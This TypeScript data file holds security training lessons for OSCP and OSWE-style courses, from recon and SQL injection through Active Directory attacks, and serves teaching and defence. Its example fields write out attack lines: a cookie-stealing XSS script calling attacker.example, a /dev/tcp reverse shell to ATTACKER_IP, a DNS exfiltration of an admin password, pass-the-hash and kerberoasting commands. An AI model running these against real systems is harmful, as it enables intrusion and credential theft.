export type SecurityLesson = {
  intro: string;
  points: string[];
  example?: string;
  exercise: string;
  source: string;
  video: string;
};

const yt = (q: string) => `https://www.youtube.com/results?search_query=${encodeURIComponent(q)}`;

// Chapter 1 already has a hand-written intro component (see oscp/registry.ts).
export const OSCP_LESSONS: (SecurityLesson | undefined)[] = [
  undefined,
  {
    intro: 'A penetration test report is the deliverable the client actually pays for. A brilliant exploit chain is worthless to the business if the report cannot explain the risk, the reproduction steps and the fix in language both engineers and executives can act on.',
    points: [
      'Structure: executive summary (business risk, no jargon), technical findings (CVSS/severity, affected assets), reproduction steps, evidence (screenshots/requests), remediation.',
      'Write findings so a developer with zero context could reproduce the issue from your steps alone.',
      'Rate severity consistently — use CVSS v3.1 rather than "gut feeling" so findings are comparable across engagements.',
      'Never include live credentials, unredacted PII or production secrets in a report that will be emailed around.',
    ],
    example: '## Finding: Reflected XSS in /search?q=\n\n**Severity:** Medium (CVSS 3.1: 6.1)\n\n**Steps to reproduce:**\n1. Navigate to https://target/search?q=<script>alert(1)</script>\n2. Observe the payload executes unescaped in the results page.\n\n**Impact:** Session token theft via crafted links sent to victims.\n**Fix:** Context-aware output encoding on the search results template.',
    exercise: 'Take any finding you have discovered on a lab machine (or a public writeup) and rewrite it in this four-part structure. Ask whether a junior developer could act on it without asking you a follow-up question.',
    source: 'https://owasp.github.io/www-project-web-security-testing-guide',
    video: yt('OSCP penetration test report writing walkthrough'),
  },
  {
    intro: 'Information gathering (recon) is the foundation of every real engagement: the more accurately you map hosts, services and technology, the fewer exploits you waste time on. It splits into passive (no traffic sent to the target) and active (direct interaction) techniques.',
    points: [
      'Passive: WHOIS, DNS records, certificate transparency logs (crt.sh), search engine dorking, LinkedIn/job postings for tech stack hints.',
      'Active: port scanning, banner grabbing, and directory/vhost brute-forcing — always only against systems you are authorized to test.',
      'Keep structured notes per host (open ports, versions, credentials found) — OSCP-style engagements live or die on organized notes.',
      'Correlate service versions against known CVEs early; do not jump straight to exploitation before you understand what is actually running.',
    ],
    example: '# Passive DNS + subdomain recon\ncurl -s "https://crt.sh/?q=%25.example.com&output=json" | jq -r \'.[].name_value\' | sort -u',
    exercise: 'Pick a domain you control (or a deliberately vulnerable lab like TryHackMe) and build a recon note: DNS records, discovered subdomains, and any technology fingerprints from response headers.',
    source: 'https://attack.mitre.org/tactics/TA0043/',
    video: yt('OSCP information gathering recon methodology'),
  },
  {
    intro: 'Vulnerability scanning automates the tedious first pass of matching service versions and configurations to known weaknesses. It is a starting point for investigation, not a substitute for manual verification — scanners produce false positives and miss business-logic flaws entirely.',
    points: [
      'Nmap with the `-sV --script vuln` NSE category gives a fast first pass of likely issues per open port.',
      'Dedicated scanners (Nessus, OpenVAS) are stronger for large host counts, but still require manual triage of every "critical" finding.',
      'Always validate scanner output manually — an unauthenticated scan cannot tell you if a "vulnerable" version is actually reachable or patched via a backport.',
      'Rate-limit and schedule scans in real engagements; an aggressive scan can crash fragile legacy services in production.',
    ],
    example: 'nmap -sV -p- --script vuln 10.10.10.5 -oA vulnscan',
    exercise: 'Run an Nmap version-detection scan against a lab VM (e.g. Metasploitable) and manually confirm one flagged vulnerability actually exists by checking the service version against a CVE database.',
    source: 'https://nmap.org/book/man.html',
    video: yt('nmap vulnerability scanning tutorial'),
  },
  {
    intro: 'Modern penetration testing spends most of its time on web applications, since they are the most common attacker-facing surface. Understanding HTTP requests, sessions, and how the client/server boundary is trusted (or not) is the prerequisite for everything else in this track.',
    points: [
      'Every request/response pair is an opportunity: headers, cookies, hidden form fields and query parameters are all attacker-controllable input.',
      'A proxy (Burp Suite / OWASP ZAP) sitting between browser and server is the single most useful tool for web testing — it lets you intercept, replay and fuzz requests.',
      'Understand trust boundaries: anything sent from the browser must be treated as untrusted by the server, no matter how much client-side validation exists.',
      'Map the application first (spidering, auth flows, API endpoints) before attacking anything — you cannot test what you have not found.',
    ],
    exercise: 'Install Burp Suite Community Edition, configure your browser to proxy through it, and browse any lab application. Inspect one request/response pair and identify every piece of client-controlled data in it.',
    source: 'https://portswigger.net/web-security',
    video: yt('burp suite web application testing basics'),
  },
  {
    intro: 'This chapter is a tour of the most common web application attack classes you will encounter repeatedly: injection, broken access control, and insecure configuration. Recognizing the pattern quickly is more valuable than memorizing any single payload.',
    points: [
      'Injection: untrusted input reaches an interpreter (SQL, OS shell, LDAP) without separation between code and data.',
      'Broken access control: the server trusts a client-supplied identifier (user ID, object ID) without re-checking permission on the server side (IDOR).',
      'Security misconfiguration: default credentials, verbose error/debug pages, and directory listing left enabled in production.',
      'Most real breaches chain several small issues together — an information leak plus a weak access control check is often enough for full compromise.',
    ],
    exercise: 'On a vulnerable lab app (DVWA, Juice Shop), find one example each of an injection flaw and a broken access control flaw, and write one sentence explaining the trust boundary that failed in each.',
    source: 'https://owasp.github.io/www-project-web-security-testing-guide',
    video: yt('OWASP top 10 web application attacks explained'),
  },
  {
    intro: 'SQL injection happens when untrusted input is concatenated directly into a database query instead of being passed as a parameter. It remains one of the most damaging web vulnerabilities because it can expose or modify an entire database.',
    points: [
      'Classic in-band injection: the query result (or error) is visible directly in the response.',
      'The only reliable fix is parameterized queries / prepared statements — never string-concatenate user input into SQL.',
      'Even with parameterized queries, dynamic table/column names or ORDER BY clauses need allow-list validation since they cannot be bound as parameters.',
      'Least privilege matters: a database account used by a web app should never have admin rights over the whole server.',
    ],
    example: "-- Vulnerable (never do this):\nquery = \"SELECT * FROM users WHERE name = '\" + input + \"'\"\n\n-- Safe (parameterized):\nPreparedStatement stmt = conn.prepareStatement(\"SELECT * FROM users WHERE name = ?\");\nstmt.setString(1, input);",
    exercise: "On a lab target (e.g. DVWA's SQLi module), try the classic `' OR '1'='1` probe in a login form to see how the query's logic changes, then look at the server code to see exactly why concatenation was unsafe.",
    source: 'https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html',
    video: yt('SQL injection explained tutorial'),
  },
  {
    intro: 'Client-side attacks target the browser and the user rather than the server directly — cross-site scripting (XSS), malicious file downloads, and social-engineering payloads delivered via seemingly normal content.',
    points: [
      'Reflected XSS: a payload in the request is echoed back unescaped in the response, executing in the victim\'s browser.',
      'Stored XSS: the payload is saved server-side (e.g. a comment) and executes for every visitor who views it — far more dangerous than reflected.',
      'The fix is context-aware output encoding (HTML entity encoding, attribute encoding, JS string encoding) plus a strict Content-Security-Policy as defense in depth.',
      'Client-side attacks are why "the server never trusted it" is not enough — the browser trusting your own site\'s HTML is the actual attack surface.',
    ],
    example: '<!-- Unescaped output — vulnerable -->\n<div>Welcome, ' + '{{user_input}}' + '</div>\n\n<!-- If user_input = <img src=x onerror=alert(1)> the browser executes it -->',
    exercise: 'On a lab app with a comment/guestbook feature, submit a benign marker payload like <b>test</b> and confirm whether it renders as bold text (unsafe) or literal text (safe output encoding).',
    source: 'https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html',
    video: yt('cross site scripting XSS explained'),
  },
  {
    intro: 'Once you have a lead (an outdated service version, a CMS plugin, a specific CVE), the next skill is efficiently locating a working, non-malicious proof-of-concept exploit and understanding what it actually does before you run it.',
    points: [
      'Searchsploit (offline Exploit-DB mirror) and the CVE/NVD database are the first stops for a version-specific lead.',
      'Always read the exploit code before running it — public PoCs sometimes include miner payloads or reverse shells hardcoded to someone else\'s IP.',
      'Cross-reference the exploit\'s prerequisites (exact version, auth requirements, target OS) against what your recon already confirmed.',
      'Prefer well-known, actively maintained toolkits (Metasploit modules) over anonymous one-off scripts when both exist for the same CVE.',
    ],
    example: 'searchsploit apache 2.4.49\nsearchsploit -m 50383   # mirror/copy the matching exploit locally for review',
    exercise: 'Pick any CVE you recognize by name (e.g. Log4Shell, EternalBlue) and find its Exploit-DB or Metasploit module entry. Read the description and note which single precondition makes the target exploitable.',
    source: 'https://attack.mitre.org/techniques/T1588/006/',
    video: yt('searchsploit exploit-db tutorial'),
  },
  {
    intro: 'Public exploits rarely work out of the box against a real target — offsets, library versions, bad characters and network conditions differ. Learning to read and adapt exploit code is what separates "copy-paste" from actual skill.',
    points: [
      'Common breakage points: hardcoded IP/port, wrong offset for a buffer overflow, or a shellcode encoder that does not avoid this target\'s bad characters.',
      'Set up a matching lab environment (same OS/service version) when possible, so you can debug the exploit locally before touching the real target.',
      'Read stack traces and error output carefully — "connection reset" vs "segfault" vs "no route to host" each point to a different root cause.',
      'Version-pin your tooling (Python 2 vs 3, library versions) since many older public exploits were never updated for modern interpreters.',
    ],
    exercise: 'Take any public Python exploit script for a lab-safe CVE and change its target IP/port variables to point at your own lab VM. Note every error you hit before it runs cleanly, and what each one told you.',
    source: 'https://attack.mitre.org/techniques/T1588/006/',
    video: yt('fixing broken public exploit code walkthrough'),
  },
  {
    intro: 'Antivirus and EDR evasion is about making a payload behave differently to defensive tooling than it does when actually executed — obfuscation, encoding, and living-off-the-land techniques that use trusted OS binaries instead of dropping new malware files.',
    points: [
      'Signature-based AV looks for known byte patterns — simple re-encoding or packing a payload can already dodge naive signatures (bypassing is not the same as being undetectable to modern EDR).',
      '"Living off the land" (LOLBins) uses built-in trusted binaries (PowerShell, certutil, rundll32) to execute or download payloads, blending in with normal admin activity.',
      'Modern EDR watches behavior, not just static signatures — process injection, unusual parent/child process trees, and command-line obfuscation are all detection triggers on their own.',
      'This is purely a defensive-research skill during authorized engagements: the goal is to demonstrate detection gaps to the blue team, not to actually evade production security controls without authorization.',
    ],
    exercise: 'In an isolated lab VM with Windows Defender enabled, review the MITRE ATT&CK "Command and Scripting Interpreter" technique and identify three built-in Windows binaries that could be abused as LOLBins, and what a defender would look for to catch each one.',
    source: 'https://attack.mitre.org/tactics/TA0005/',
    video: yt('antivirus evasion techniques explained defensive'),
  },
  {
    intro: 'Password attacks exploit weak, reused, or poorly hashed credentials rather than a software bug. They remain one of the highest-yield techniques because humans are predictable and organizations under-invest in authentication hardening.',
    points: [
      'Online brute force (guessing against a live login) is slow and noisy; offline cracking (against a stolen hash dump) is fast and silent once you have the hashes.',
      'Password spraying (few common passwords across many accounts) evades per-account lockout policies that block classic brute force.',
      'Hash type matters enormously for cracking speed — unsalted MD5 cracks in seconds, properly salted bcrypt/argon2 can be effectively uncrackable at scale.',
      'The best defenses are MFA and long passphrases (length beats complexity rules) plus blocking known-breached passwords via blocklists.',
    ],
    example: 'hashcat -m 0 -a 0 hashes.txt rockyou.txt   # dictionary attack against unsalted MD5 hashes',
    exercise: 'Using a lab-safe hash sample and a small wordlist, run hashcat or John the Ripper locally and observe how much faster an unsalted MD5 hash cracks compared to a bcrypt hash of the same password.',
    source: 'https://attack.mitre.org/techniques/T1110/',
    video: yt('hashcat password cracking tutorial'),
  },
  {
    intro: 'Windows privilege escalation is the process of turning a low-privileged foothold into SYSTEM/Administrator access, by abusing misconfigurations rather than memory-corruption exploits in most real engagements.',
    points: [
      'Common vectors: weak service permissions (can you replace the binary a SYSTEM service runs?), unquoted service paths, and stored credentials in scripts/registry.',
      'Automated enumeration scripts (WinPEAS, PowerUp) surface these misconfigurations quickly, but you must understand *why* each finding is exploitable before using it.',
      'Token/impersonation abuse (e.g. Potato-family exploits) escalates from a service account to SYSTEM by abusing Windows privilege assignment.',
      'Always confirm privilege escalation in a lab before attempting on a client system — some techniques can crash the target service.',
    ],
    example: 'wmic service get name,pathname,startmode | findstr /i "auto" | findstr /vi "C:\\\\Windows\\\\"',
    exercise: 'On a Windows lab VM, run WinPEAS or a manual `sc qc <service>` sweep, and identify one service you (as a low-privileged user) could write to or reconfigure.',
    source: 'https://attack.mitre.org/tactics/TA0004/',
    video: yt('windows privilege escalation walkthrough'),
  },
  {
    intro: 'Linux privilege escalation mirrors the Windows chapter conceptually but with different mechanisms: SUID binaries, sudo misconfigurations, cron jobs, and kernel exploits are the main avenues from a low-privileged shell to root.',
    points: [
      'SUID/SGID binaries that run as root but can be abused (via GTFOBins-style tricks) to spawn a root shell are one of the most common wins.',
      '`sudo -l` reveals what commands the current user can run as root — misconfigured wildcard or path-less entries are frequently exploitable.',
      'World-writable cron jobs or scripts run by root are a classic and quiet privilege escalation path.',
      'Kernel exploits are a last resort — they are noisy, version-specific and can crash the box, so exhaust configuration-based vectors first.',
    ],
    example: 'find / -perm -4000 -type f 2>/dev/null   # find SUID binaries\nsudo -l                                    # list allowed sudo commands',
    exercise: 'On a lab VM, run the SUID find command above and cross-reference any unusual binaries against GTFOBins to see if a known privilege-escalation technique exists for it.',
    source: 'https://attack.mitre.org/tactics/TA0004/',
    video: yt('linux privilege escalation walkthrough'),
  },
  {
    intro: 'Advanced tunneling lets you pivot through a compromised host to reach internal networks that are not directly routable from your attacking machine — essential once initial access is limited to a single DMZ box.',
    points: [
      'SSH local/remote/dynamic port forwarding is the simplest form of tunneling and is built into virtually every Unix host.',
      'A SOCKS proxy (via `ssh -D`) lets tools like proxychains route arbitrary traffic through the compromised host without per-port forwarding rules.',
      'Protocol tunneling (encapsulating traffic inside DNS or HTTPS) is used when only those protocols can egress a restrictive firewall.',
      'Document every pivot hop during an engagement — losing track of which host proxies to which is a common and dangerous mistake.',
    ],
    example: 'ssh -D 9050 user@pivot-host      # local SOCKS proxy through pivot-host\nproxychains nmap -sT -p 445 10.10.20.5   # scan an internal host through the tunnel',
    exercise: 'In a lab with two chained VMs, set up an SSH dynamic port forward from your attacker box through the first VM, then use proxychains to reach a service only visible from that first VM\'s internal network.',
    source: 'https://attack.mitre.org/techniques/T1572/',
    video: yt('ssh pivoting proxychains tutorial'),
  },
  {
    intro: 'Metasploit Framework is the most widely used exploitation and post-exploitation platform, bundling exploits, payloads, and a scripting console (Meterpreter) that dramatically speeds up lab work and real engagements alike.',
    points: [
      '`search`, `use`, `show options`, `set`, `run`/`exploit` is the core workflow for firing any module.',
      'Meterpreter (the advanced payload) gives you a scripting-capable, in-memory session for post-exploitation: file transfer, pivoting, credential harvesting.',
      'Understand what a module actually does before running it against anything but a lab — Metasploit makes exploitation easy, which also makes it easy to cause real damage without meaning to.',
      'Metasploit is a force-multiplier, not a substitute for understanding the vulnerability class it automates.',
    ],
    example: 'msfconsole\nsearch type:exploit name:eternalblue\nuse exploit/windows/smb/ms17_010_eternalblue\nset RHOSTS 10.10.10.5\nrun',
    exercise: 'In a lab environment (e.g. Metasploitable2), use msfconsole to find and run one matching exploit module, then use the resulting Meterpreter session to run `sysinfo` and `getuid`.',
    source: 'https://docs.metasploit.com/',
    video: yt('metasploit framework tutorial for beginners'),
  },
  {
    intro: 'Active Directory (AD) is the identity and access backbone of most enterprise Windows networks. Understanding its object model — domains, forests, users, groups, and trust relationships — is the prerequisite for every AD attack technique that follows.',
    points: [
      'Core objects: domain controllers hold the directory database; users and computers are objects with security identifiers (SIDs); groups grant nested permissions.',
      'Enumeration tools like BloodHound turn raw AD data into an attack-path graph, showing exactly which low-privileged user can reach Domain Admin and how.',
      'Kerberos is AD\'s default authentication protocol — tickets (TGT/TGS) replace direct password exchange, which is why ticket-based attacks (later chapters) are so powerful.',
      'A single misconfigured ACL or nested group membership can silently grant far more access than intended — enumeration is often more valuable than exploitation here.',
    ],
    example: '# Basic unauthenticated enumeration\nnmap -p 389,445,88 --script ldap-rootdse 10.10.10.100',
    exercise: 'In an AD lab (e.g. a HackTheBox or TryHackMe AD box), run BloodHound\'s collector (SharpHound) with a low-privileged user\'s credentials and identify one attack path to Domain Admin in the resulting graph.',
    source: 'https://docs.metasploit.com/docs/pentesting/active-directory/',
    video: yt('active directory enumeration bloodhound tutorial'),
  },
  {
    intro: 'Attacking AD authentication targets Kerberos and NTLM directly: extracting or forging tickets, and cracking service account credentials offline via Kerberoasting, rather than brute-forcing logins.',
    points: [
      'Kerberoasting: request a service ticket (TGS) for any service account with a Service Principal Name (SPN), then crack it offline — no elevated privileges required to request the ticket.',
      'AS-REP Roasting targets accounts with Kerberos pre-authentication disabled, letting you request a crackable hash without any credentials at all.',
      'Pass-the-Hash and Pass-the-Ticket let an attacker reuse a captured NTLM hash or Kerberos ticket without ever knowing the plaintext password.',
      'Mitigations: strong, rotated service-account passwords (or Group Managed Service Accounts), enforcing AES over RC4, and monitoring for abnormal TGS request volume.',
    ],
    example: '# Request and crack a kerberoastable SPN account (lab only)\nGetUserSPNs.py DOMAIN/user:password -dc-ip 10.10.10.100 -request\nhashcat -m 13100 spn_hashes.txt rockyou.txt',
    exercise: 'In an AD lab with a deliberately kerberoastable service account, request its TGS ticket with a low-privileged domain user and attempt to crack the resulting hash with a small wordlist.',
    source: 'https://attack.mitre.org/techniques/T1558/003/',
    video: yt('kerberoasting active directory attack tutorial'),
  },
  {
    intro: 'Lateral movement in Active Directory is how an attacker expands from one compromised host to the rest of the domain, reusing captured credentials or tickets to authenticate to additional systems.',
    points: [
      'Valid Accounts + Remote Services (RDP, WinRM, SMB admin shares) is the most common lateral movement pattern once any credential is captured.',
      'Pass-the-Hash/Pass-the-Ticket (from the previous chapter) let you move laterally without ever cracking the underlying password.',
      'Tools like CrackMapExec/NetExec and Impacket\'s psexec/wmiexec automate credential validation and remote command execution across many hosts at once.',
      'Detection relies on correlating authentication logs across hosts — a single account authenticating to unusually many systems in a short window is a strong lateral-movement signal.',
    ],
    example: '# Validate a captured hash against many hosts, then execute remotely (lab only)\nnetexec smb 10.10.20.0/24 -u administrator -H <ntlm_hash>\nimpacket-wmiexec DOMAIN/administrator@10.10.20.5 -hashes :<ntlm_hash>',
    exercise: 'In a multi-host AD lab, take a captured local administrator hash from one machine and use it (via pass-the-hash) to authenticate to a second machine sharing the same local administrator credentials.',
    source: 'https://attack.mitre.org/tactics/TA0008/',
    video: yt('active directory lateral movement pass the hash tutorial'),
  },
];

export const OSWE_LESSONS: SecurityLesson[] = [
  {
    intro: 'Prototype pollution is a JavaScript-specific vulnerability where an attacker injects properties into a base object prototype (like Object.prototype), so every object in the application unexpectedly inherits attacker-controlled properties. It can escalate to XSS, authentication bypass, or even remote code execution depending on how the polluted property is later used.',
    points: [
      'Happens most often through unsafe recursive merge/clone/extend utilities that do not block the `__proto__`, `constructor`, or `prototype` keys.',
      'A polluted property can silently flip a security-relevant flag (e.g. `isAdmin`) across every object in the app, not just the one the attacker touched.',
      'Prevention: use `Object.create(null)` for maps of untrusted keys, or `new Map()`/`new Set()` instead of plain object literals.',
      'Node.js can also mitigate with the `--disable-proto=delete` flag as defense in depth, though `constructor.prototype` paths still need blocking separately.',
    ],
    example: '// Vulnerable recursive merge\nfunction merge(target, source) {\n  for (const key in source) {\n    if (typeof source[key] === "object") merge(target[key] = target[key] || {}, source[key]);\n    else target[key] = source[key];\n  }\n}\n// merge({}, JSON.parse(\'{"__proto__":{"isAdmin":true}}\'))',
    exercise: 'Write a small Node.js script with the vulnerable merge function above, and confirm that after merging an attacker-supplied `__proto__` payload, a brand new plain object `{}` now has an `isAdmin` property.',
    source: 'https://cheatsheetseries.owasp.org/cheatsheets/Prototype_Pollution_Prevention_Cheat_Sheet.html',
    video: yt('javascript prototype pollution explained'),
  },
  {
    intro: 'Advanced SSRF (Server-Side Request Forgery) goes beyond the basic "fetch this URL" case to cover bypasses of allow-lists and deny-lists — redirects, DNS rebinding, and alternate IP encodings that trick a server into requesting internal resources on the attacker\'s behalf.',
    points: [
      'Basic SSRF: an app fetches a user-supplied URL (e.g. a webhook or avatar-from-URL feature) without restriction, letting an attacker reach internal-only services.',
      'Bypass techniques: redirect chains (the first request passes validation, the redirect target does not get re-validated), decimal/octal/hex IP encoding, and DNS rebinding after validation.',
      'Cloud metadata endpoints (e.g. 169.254.169.254) are a classic high-value SSRF target for stealing instance credentials.',
      'Best defense: allow-list destinations, disable following redirects in the HTTP client, and re-validate the resolved IP is not in a private range immediately before connecting (not just at input time).',
    ],
    example: '# Naive SSRF probe against a URL-fetching feature\ncurl "https://target/fetch?url=http://169.254.169.254/latest/meta-data/"',
    exercise: 'In a lab SSRF challenge (PortSwigger Web Security Academy has several), try bypassing an IP-based deny-list using an alternate encoding of localhost (e.g. `0177.0.0.1` or `2130706433`).',
    source: 'https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html',
    video: yt('SSRF server side request forgery advanced bypass'),
  },
  {
    intro: 'Modern web security assessment relies on a small, well-understood toolkit rather than any single "magic" scanner: an intercepting proxy, a source-aware static analysis pass, and a disciplined methodology for moving from recon to exploitation to reporting.',
    points: [
      'Burp Suite (or OWASP ZAP) is the daily driver for any web assessment — intercepting, repeating and fuzzing requests.',
      'Static analysis (manual code review, or tools like Semgrep) catches classes of bugs dynamic testing alone will miss, especially business-logic flaws.',
      'A written methodology (OWASP Web Security Testing Guide) keeps assessments consistent and reduces the chance of missing a whole vulnerability class.',
      'Every finding needs both a proof-of-concept AND a plain-language explanation of business impact — tooling output alone is not a deliverable.',
    ],
    exercise: 'Pick one OWASP Web Security Testing Guide category (e.g. "Testing for Cross-Site Scripting") and read its testing methodology end-to-end, noting the specific test cases it recommends before you would call the check "done".',
    source: 'https://owasp.github.io/www-project-web-security-testing-guide',
    video: yt('web application security testing methodology'),
  },
  {
    intro: 'Source code analysis (white-box review) finds vulnerabilities by reading the application\'s own code rather than only probing it from outside. It is slower per-line than automated scanning but finds business-logic and authorization flaws that black-box testing frequently misses entirely.',
    points: [
      'Start from "sources" (anywhere untrusted input enters: request params, headers, file uploads) and trace forward to "sinks" (SQL queries, shell exec, template rendering, deserialization calls).',
      'Prioritize authentication and authorization code first — these bugs tend to have the highest impact and are the hardest to find via black-box testing alone.',
      'Diffing against a previous known-good version (or the public open-source upstream) quickly surfaces custom, potentially unreviewed modifications.',
      'Static analysis tools (Semgrep, CodeQL) scale this process across large codebases, but still require a human to confirm each hit is exploitable.',
    ],
    exercise: 'Pick an open-source web app on GitHub and grep for a dangerous sink (e.g. `eval(`, `exec(`, raw SQL string concatenation). For one hit, trace backward to see whether the value ever originates from untrusted user input.',
    source: 'https://wiki.owasp.org/index.php/Category:OWASP_Code_Review_Project',
    video: yt('source code review security vulnerabilities tutorial'),
  },
  {
    intro: 'Persistent (stored) XSS is the most dangerous XSS variant: the malicious payload is saved server-side (a comment, profile field, support ticket) and executes automatically for every user — including administrators — who later views that content.',
    points: [
      'Unlike reflected XSS, no crafted link needs to be sent to the victim — simply viewing a normal page triggers the stored payload.',
      'A frequent high-value target is an admin panel that renders user-submitted content (support tickets, usernames) without encoding — a single stored payload can compromise every admin session.',
      'Rich-text/WYSIWYG fields are especially risky: they need HTML sanitization (e.g. DOMPurify), not just encoding, since some HTML must be allowed through.',
      'Defense in depth: output encoding at render time, a strict Content-Security-Policy, and HttpOnly cookies so even a successful XSS cannot directly read the session cookie.',
    ],
    example: '<!-- Stored in a "profile bio" field, rendered unescaped for every visitor -->\n<script>fetch("https://attacker.example/steal?c="+document.cookie)</script>',
    exercise: 'On a lab app with a comment or profile field, submit a benign marker (e.g. `<b>test</b>`) and reload the page as a different user to confirm whether the stored value is encoded or executed.',
    source: 'https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html',
    video: yt('stored persistent XSS vulnerability tutorial'),
  },
  {
    intro: 'Session hijacking is the theft or prediction of a valid session identifier, letting an attacker impersonate a logged-in user without ever knowing their password. It is usually the end-goal of an XSS or network sniffing attack, or the result of weak session ID generation.',
    points: [
      'Session IDs need at least 64 bits of entropy from a cryptographically secure random source — predictable or sequential IDs can be brute-forced or guessed.',
      'Cookies carrying session IDs should always set `HttpOnly` (blocks JS access, mitigating XSS-based theft), `Secure` (HTTPS-only), and `SameSite` (CSRF defense in depth).',
      'Regenerate the session ID on any privilege change (login, password change) to prevent session fixation attacks.',
      'Bind sessions to additional signals (IP range, User-Agent) as a detection layer — not a hard security boundary, since these can be spoofed, but useful for anomaly alerts.',
    ],
    exercise: 'Inspect the `Set-Cookie` header of any site you use, and check whether the session cookie sets `HttpOnly`, `Secure`, and `SameSite`. Note which protections are missing, if any.',
    source: 'https://cheatsheetseries.owasp.org/cheatsheets/Session_Management_Cheat_Sheet.html',
    video: yt('session hijacking cookie security explained'),
  },
  {
    intro: '.NET deserialization vulnerabilities occur when an application deserializes attacker-controlled data using an unsafe binder that can instantiate arbitrary types — some of which have side effects (like running a process) purely as part of being constructed, leading directly to remote code execution.',
    points: [
      '`BinaryFormatter` is considered unsafe by Microsoft itself and cannot be secured for untrusted input — it should not be used at all for that purpose.',
      'Known "gadget chains" (e.g. via `ObjectDataProvider`, `WorkflowDesigner`) turn an apparently harmless deserialization call into arbitrary code execution.',
      'Detection clue: base64 data starting with `AAEAAAD/////` is the signature of a .NET binary-serialized payload worth investigating.',
      'Safer alternatives: use `DataContractSerializer`/`System.Text.Json` with strict type allow-lists, and never let the incoming data stream dictate which type gets instantiated.',
    ],
    exercise: 'Research the `ysoserial.net` tool\'s README (without running it against anything but your own lab) and identify which gadget chain targets `ObjectDataProvider`, and what real-world component (WPF) that gadget depends on.',
    source: 'https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html',
    video: yt('.NET deserialization vulnerability RCE explained'),
  },
  {
    intro: 'Remote Code Execution (RCE) is the umbrella outcome of many different vulnerability classes — deserialization, command injection, unsafe file upload, SSTI — all converging on the same result: the attacker can run arbitrary code on the server.',
    points: [
      'RCE is rarely a vulnerability class on its own — it is the *impact* of chaining an input-validation failure with a dangerous sink (interpreter, deserializer, template engine).',
      'Once RCE is achieved, the standard next steps are establishing a reverse shell, then following post-exploitation practices (least footprint, no unnecessary lateral movement in real engagements).',
      'Defense in depth matters even after other mitigations fail: running services as a low-privileged, sandboxed user limits the blast radius of any single RCE.',
      'MITRE ATT&CK\'s Command and Scripting Interpreter technique catalogs the actual mechanisms (PowerShell, bash, Python) adversaries use once RCE is achieved.',
    ],
    example: '# Minimal reverse shell pattern once RCE is confirmed in a lab (bash target)\nbash -c "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"',
    exercise: 'Trace back through the last three chapters (deserialization, XSS) and write one sentence each on how each vulnerability class could theoretically be chained into full RCE.',
    source: 'https://attack.mitre.org/techniques/T1059/',
    video: yt('remote code execution vulnerability explained'),
  },
  {
    intro: 'Blind SQL injection occurs when the application is vulnerable to SQL injection but never reflects query results or database errors back in the response. Data must be extracted indirectly — via boolean conditions, timing delays, or out-of-band channels — one bit at a time.',
    points: [
      'Boolean-based: inject a condition and observe a difference in the response (e.g. "Welcome back" vs nothing) to infer true/false.',
      'Time-based: inject a conditional delay (`IF(condition, SLEEP(5), 0)`) and measure response time when no visible difference exists at all.',
      'Out-of-band (OAST): trigger a DNS/HTTP callback to an attacker-controlled server, exfiltrating data directly in the subdomain of the lookup — often the most reliable technique when others fail.',
      'The prevention is identical to normal SQL injection: parameterized queries. Blind SQLi is only harder to *find and exploit*, not fundamentally different to prevent.',
    ],
    example: "-- Boolean-based probe\nxyz' AND SUBSTRING((SELECT password FROM users WHERE username='admin'),1,1)='a\n\n-- Time-based probe (MySQL)\nxyz' AND IF(1=1, SLEEP(5), 0)-- -",
    exercise: 'On a lab blind-SQLi challenge (PortSwigger Web Security Academy has several labs), extract a single character of a password using the time-delay technique and confirm it against the boolean-based technique for the same character.',
    source: 'https://portswigger.net/web-security/sql-injection/blind',
    video: yt('blind SQL injection tutorial'),
  },
  {
    intro: 'Data exfiltration is the step where an attacker actually moves stolen data out of a compromised environment. Understanding exfiltration channels is essential both offensively (to complete an engagement PoC) and defensively (to detect and block them).',
    points: [
      'In-band exfiltration reuses the same channel as the attack (e.g. reading query results directly in an HTTP response).',
      'Out-of-band exfiltration uses a second channel entirely — DNS lookups and HTTP callbacks to an attacker server are the most common, since DNS egress is rarely blocked.',
      'Data can be smuggled encoded into hostnames (`<stolen-data>.attacker.example`) a piece at a time, working around strict output filters that block direct data return.',
      'Defensively: egress filtering, DNS query monitoring, and DLP (data loss prevention) tooling are the standard mitigations — assume any allowed outbound protocol can be abused for exfiltration.',
    ],
    example: '-- Exfiltrate a password via DNS lookup (MSSQL out-of-band, lab only)\n\'; declare @p varchar(1024); set @p=(SELECT password FROM users WHERE username=\'admin\'); exec(\'master..xp_dirtree "//\'+@p+\'.attacker-collab.example/a"\')--',
    exercise: 'Explain, in your own words, why an organization that blocks all outbound HTTP but allows outbound DNS is still exposed to a data exfiltration channel.',
    source: 'https://portswigger.net/web-security/sql-injection/blind',
    video: yt('data exfiltration techniques DNS out of band'),
  },
  {
    intro: 'File upload functionality is a frequent path to remote code execution when an attacker can upload a server-side executable script (e.g. a `.php` webshell) and then have the server execute it — bypassing weak or purely client-side extension checks.',
    points: [
      'Never trust a client-supplied `Content-Type` header — it is trivially spoofed and must not be the only validation performed.',
      'Extension allow-lists (not deny-lists) plus validating actual file content/signature (magic bytes) are the strongest combination of checks.',
      'Classic bypasses: double extensions (`shell.php.jpg`), null-byte truncation (`shell.php%00.jpg`), and case variation on filesystems that treat extensions case-insensitively.',
      'Even with strict validation, store uploads outside the webroot (or in a location with no script execution permission) so that even a successfully uploaded malicious file cannot be directly executed.',
    ],
    example: '# Classic double-extension bypass attempt against a weak filter (lab only)\ncurl -F "file=@shell.php.jpg" https://target/upload',
    exercise: 'On a lab file-upload challenge, try bypassing an extension filter using a double extension or a null-byte trick, then confirm whether the server actually executes the uploaded file when you request it directly.',
    source: 'https://cheatsheetseries.owasp.org/cheatsheets/File_Upload_Cheat_Sheet.html',
    video: yt('file upload vulnerability bypass tutorial'),
  },
  {
    intro: 'PHP\'s loose (`==`) comparison performs type juggling — automatically converting operand types before comparing — which produces surprising, exploitable results when comparing strings that look numeric, most famously in authentication and hash-comparison code.',
    points: [
      'A classic gotcha: `"0e123456" == "0e654321"` evaluates to `true` in loose comparison, because both strings are interpreted as scientific notation for zero — the basis of "magic hash" attacks.',
